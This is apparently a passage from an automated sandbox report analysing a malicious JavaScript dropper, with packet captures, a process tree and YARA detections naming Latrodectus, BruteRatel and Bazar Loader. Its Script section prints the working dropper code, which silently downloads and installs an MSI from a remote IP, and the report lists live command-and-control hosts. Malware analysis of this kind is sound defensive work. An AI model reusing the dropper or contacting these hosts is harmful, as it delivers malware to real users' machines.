                                                                                                                                                                                                                                                    37192.168.2.55003980.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.425404072 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    38192.168.2.55004080.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.075792074 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    39192.168.2.55004280.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:45.837219000 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    40192.168.2.55004380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:46.490183115 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    41192.168.2.55005280.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.707431078 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.550048188.114.96.34431028C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-03 18:44:05 UTC418OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                    Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                    Host: isomicrotich.com
                                                                                                                                                                                                                                                    Content-Length: 92
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    2024-10-03 18:44:05 UTC92OUTData Raw: 31 51 44 56 39 33 6c 49 59 36 59 33 35 2f 69 57 77 44 6f 54 6c 4b 44 73 77 71 43 47 67 6a 4e 79 5a 51 78 76 35 61 52 59 74 4d 4e 45 34 73 65 48 50 58 4a 5a 70 54 7a 75 49 78 70 6f 48 76 7a 37 56 5a 4b 6d 4e 44 79 65 41 6a 70 44 4c 30 49 47 51 4a 7a 4e 57 52 56 48 7a 56 45 3d
                                                                                                                                                                                                                                                    Data Ascii: 1QDV93lIY6Y35/iWwDoTlKDswqCGgjNyZQxv5aRYtMNE4seHPXJZpTzuIxpoHvz7VZKmNDyeAjpDL0IGQJzNWRVHzVE=
                                                                                                                                                                                                                                                    2024-10-03 18:44:06 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 18:44:06 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fE0s8DfJbSxGh2F%2FN5y3tg1cRzEhPtAqwXoFzShLKglxKYTo7YicyqsO%2F2QttoBwBiqEtfL7ckoINTyXGP%2B8ZK6X3oyVBPbmqfwQRCMr83GEgZ24d1VX8uXcQeMDpegs%2BjuO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8ccf14e318e87298-EWR
                                                                                                                                                                                                                                                    2024-10-03 18:44:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.550050188.114.96.34431028C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-03 18:44:08 UTC417OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                    Cookie: kALB+jBIcqFg9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                    Host: isomicrotich.com
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    2024-10-03 18:44:08 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 18:44:08 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HlJg4bduKuuS3zrJh3Yz%2B6YBh%2FICwNvLaqWij3qYE%2BNsfMBV2eGfN%2Fkw7R90o1rtpqLDwGuLejZFUgnFpljHtiFd9CUuFKRGecgLmA5qdJK9%2B8naX0fxhxa42i9TBByPZl1o"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8ccf14f12ad21861-EWR
                                                                                                                                                                                                                                                    2024-10-03 18:44:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.550051188.114.96.34431028C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-03 18:44:09 UTC417OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                    Cookie: kALB+jBIcqFj9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                    Host: isomicrotich.com
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    2024-10-03 18:44:10 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 18:44:10 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9RB9XhtBjDIMJyH8PUbgfSc6SKTnQLRWNSuIXZKc3kjaEYW9ZxVs7slnZDUfBv4IbD6mfSfObKsOufFoPj1nxDeE%2FTrhmfbukYCzRpU9bcU%2Bha5T4Jo9KIvgVN57QAOl6xi0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8ccf14f8ca39430e-EWR
                                                                                                                                                                                                                                                    2024-10-03 18:44:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    3192.168.2.550053188.114.96.34431028C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-03 18:44:14 UTC417OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                    Cookie: kALB+jBIcqFi9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                    Host: isomicrotich.com
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    2024-10-03 18:44:14 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 18:44:14 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0aGxZ66p9YHBzrHIKvxQf2ShmeJDC2ll7AD82wFIoS33oK8qMt2gKjNac2GiQcCvevIUPaCrcE850e%2B62u5j%2BeG6WK55tN3qyjfiW4KyA8NLypSka4%2Blee9glSWtAnVC0b6N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8ccf15165f9142c1-EWR
                                                                                                                                                                                                                                                    2024-10-03 18:44:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:14:41:59
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js"
                                                                                                                                                                                                                                                    Imagebase:0x7ff695ec0000
                                                                                                                                                                                                                                                    File size:170'496 bytes
                                                                                                                                                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                                    Start time:14:42:00
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                    Imagebase:0x7ff761510000
                                                                                                                                                                                                                                                    File size:69'632 bytes
                                                                                                                                                                                                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                    Start time:14:42:02
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4
                                                                                                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                    Start time:14:42:03
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\Installer\MSIF29D.tmp
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                                                                                                    File size:399'328 bytes
                                                                                                                                                                                                                                                    MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                    Start time:14:42:03
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                    Imagebase:0x8c0000
                                                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                    Start time:14:42:03
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                    Imagebase:0x7ff7a4580000
                                                                                                                                                                                                                                                    File size:71'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_BruteRatel_2, Description: Yara detected BruteRatel, Source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                    Start time:14:42:41
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                    Imagebase:0x7ff674740000
                                                                                                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                                                                    Call Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    callgraph clusterC0 E1C0 entry:C0

                                                                                                                                                                                                                                                    Script:

                                                                                                                                                                                                                                                    Code
                                                                                                                                                                                                                                                    0
                                                                                                                                                                                                                                                    var activex = "ActiveXObject";
                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      var method = "InstallProduct";
                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        var d = "WindowsInstaller.Installer";
                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                          var a = "http://188.119.112.7/das.msi";
                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                            var j = "UILevel";
                                                                                                                                                                                                                                                              5
                                                                                                                                                                                                                                                              var f = 2;
                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                var obj = new this[activex] ( d );
                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                  obj[j] = f;
                                                                                                                                                                                                                                                                    8
                                                                                                                                                                                                                                                                    obj[method] ( a );
                                                                                                                                                                                                                                                                    • InstallProduct("http://188.119.112.7/das.msi") ➔ undefined
                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                      Execution Coverage:1.4%
                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                      Signature Coverage:31.1%
                                                                                                                                                                                                                                                                      Total number of Nodes:322
                                                                                                                                                                                                                                                                      Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                      execution_graph 33380 fd3084 33381 fd3090 __FrameHandler3::FrameUnwindToState 33380->33381 33406 fd2de4 33381->33406 33383 fd3097 33384 fd31ea 33383->33384 33392 fd30c1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 33383->33392 33440 fd33a8 4 API calls 2 library calls 33384->33440 33386 fd31f1 33441 fe2ed9 23 API calls std::locale::_Setgloballocale 33386->33441 33388 fd31f7 33442 fe2e9d 23 API calls std::locale::_Setgloballocale 33388->33442 33390 fd31ff 33391 fd30e0 33392->33391 33396 fd3161 33392->33396 33439 fe2eb3 41 API calls 4 library calls 33392->33439 33394 fd3167 33418 fbcdb0 GetCommandLineW 33394->33418 33417 fd34c3 GetStartupInfoW _Getvals 33396->33417 33407 fd2ded 33406->33407 33443 fd35a9 IsProcessorFeaturePresent 33407->33443 33409 fd2df9 33444 fd58dc 10 API calls 2 library calls 33409->33444 33411 fd2dfe 33412 fd2e02 33411->33412 33445 fe393e 33411->33445 33412->33383 33415 fd2e19 33415->33383 33417->33394 33419 fbcdf8 33418->33419 33504 fb1f80 LocalAlloc 33419->33504 33421 fbce09 33505 fb69a0 33421->33505 33423 fbce58 33424 fbce69 33423->33424 33425 fbce5c 33423->33425 33513 fbc6a0 LocalAlloc LocalAlloc 33424->33513 33597 fb6600 98 API calls __ehhandler$___std_fs_get_file_id@8 33425->33597 33428 fbce65 33430 fbceb0 ExitProcess 33428->33430 33429 fbce72 33514 fbc870 33429->33514 33435 fbce9a 33598 fbcce0 CreateFileW SetFilePointer WriteFile CloseHandle 33435->33598 33436 fbcea4 33599 fbcec0 LocalFree LocalFree 33436->33599 33439->33396 33440->33386 33441->33388 33442->33390 33443->33409 33444->33411 33449 febedb 33445->33449 33448 fd58fb 7 API calls 2 library calls 33448->33412 33450 febeeb 33449->33450 33451 fd2e0b 33449->33451 33450->33451 33453 fe6d2d 33450->33453 33451->33415 33451->33448 33454 fe6d39 __FrameHandler3::FrameUnwindToState 33453->33454 33465 fe1c9a EnterCriticalSection 33454->33465 33456 fe6d40 33466 fec4cc 33456->33466 33461 fe6d59 33480 fe6c7d GetStdHandle GetFileType 33461->33480 33462 fe6d6f 33462->33450 33464 fe6d5e 33481 fe6d84 LeaveCriticalSection std::_Lockit::~_Lockit 33464->33481 33465->33456 33467 fec4d8 __FrameHandler3::FrameUnwindToState 33466->33467 33468 fec502 33467->33468 33469 fec4e1 33467->33469 33482 fe1c9a EnterCriticalSection 33468->33482 33490 fd7370 14 API calls __dosmaperr 33469->33490 33472 fec4e6 33491 fd7017 41 API calls collate 33472->33491 33473 fec50e 33478 fec53a 33473->33478 33483 fec41c 33473->33483 33475 fe6d4f 33475->33464 33479 fe6bc7 44 API calls 33475->33479 33492 fec561 LeaveCriticalSection std::_Lockit::~_Lockit 33478->33492 33479->33461 33480->33464 33481->33462 33482->33473 33493 fe70bb 33483->33493 33485 fec43b 33501 fe53b8 14 API calls __dosmaperr 33485->33501 33486 fec42e 33486->33485 33500 fe776f 6 API calls __dosmaperr 33486->33500 33489 fec490 33489->33473 33490->33472 33491->33475 33492->33475 33498 fe70c8 __cftoe 33493->33498 33494 fe7108 33503 fd7370 14 API calls __dosmaperr 33494->33503 33495 fe70f3 RtlAllocateHeap 33496 fe7106 33495->33496 33495->33498 33496->33486 33498->33494 33498->33495 33502 febf83 EnterCriticalSection LeaveCriticalSection __cftoe 33498->33502 33500->33486 33501->33489 33502->33498 33503->33496 33504->33421 33506 fb69f2 33505->33506 33507 fb6a34 33506->33507 33510 fb6a22 33506->33510 33508 fd2937 __ehhandler$___std_fs_get_file_id@8 5 API calls 33507->33508 33509 fb6a42 33508->33509 33509->33423 33600 fd2937 33510->33600 33512 fb6a30 33512->33423 33513->33429 33515 fbc889 33514->33515 33520 fbcb32 33514->33520 33516 fbcb92 33515->33516 33515->33520 33608 fb6250 14 API calls 33516->33608 33518 fbcba2 RegOpenKeyExW 33519 fbcbc0 RegQueryValueExW 33518->33519 33518->33520 33519->33520 33521 fb6a50 33520->33521 33522 fb6aa3 GetCurrentProcess OpenProcessToken 33521->33522 33523 fb6a84 33521->33523 33527 fb6b09 33522->33527 33528 fb6adf 33522->33528 33524 fd2937 __ehhandler$___std_fs_get_file_id@8 5 API calls 33523->33524 33525 fb6a9f 33524->33525 33525->33435 33525->33436 33609 fb5de0 33527->33609 33529 fb6b02 33528->33529 33530 fb6af4 CloseHandle 33528->33530 33657 fb57c0 GetCurrentProcess OpenProcessToken 33529->33657 33530->33529 33534 fb6b2e 33536 fb6b3f 33534->33536 33537 fb6b32 33534->33537 33535 fb6b20 33539 fb1770 42 API calls 33535->33539 33612 fb5f40 ConvertSidToStringSidW 33536->33612 33540 fb1770 42 API calls 33537->33540 33538 fb6c29 33542 fb6ddb 33538->33542 33547 fb6c43 33538->33547 33539->33528 33540->33528 33662 fb2310 56 API calls 33542->33662 33545 fb6e04 33548 fb6f2d 33545->33548 33663 fb46f0 52 API calls 33545->33663 33714 fb2310 56 API calls 33547->33714 33727 fb11d0 RaiseException _com_raise_error 33548->33727 33550 fb6c57 33550->33548 33715 fb46f0 52 API calls 33550->33715 33555 fb6b85 33643 fb2e60 33555->33643 33558 fb2e60 42 API calls 33560 fb6bf5 33558->33560 33559 fb6e59 33664 fb2310 56 API calls 33559->33664 33649 fb1770 33560->33649 33562 fb6e29 33562->33559 33562->33562 33724 fb4ac0 42 API calls 3 library calls 33562->33724 33563 fb6cad 33717 fb2310 56 API calls 33563->33717 33565 fb6e68 33565->33548 33665 fb46f0 52 API calls 33565->33665 33569 fb6cc7 33569->33548 33718 fb46f0 52 API calls 33569->33718 33570 fb6c7c 33570->33563 33716 fb4ac0 42 API calls 3 library calls 33570->33716 33571 fb6c16 CloseHandle 33571->33529 33575 fb6eb9 33666 fb2310 56 API calls 33575->33666 33577 fb6ec4 33577->33548 33667 fb46f0 52 API calls 33577->33667 33578 fb6d19 33720 fb2310 56 API calls 33578->33720 33579 fb6e8a 33579->33575 33725 fb4ac0 42 API calls 3 library calls 33579->33725 33582 fb6ce9 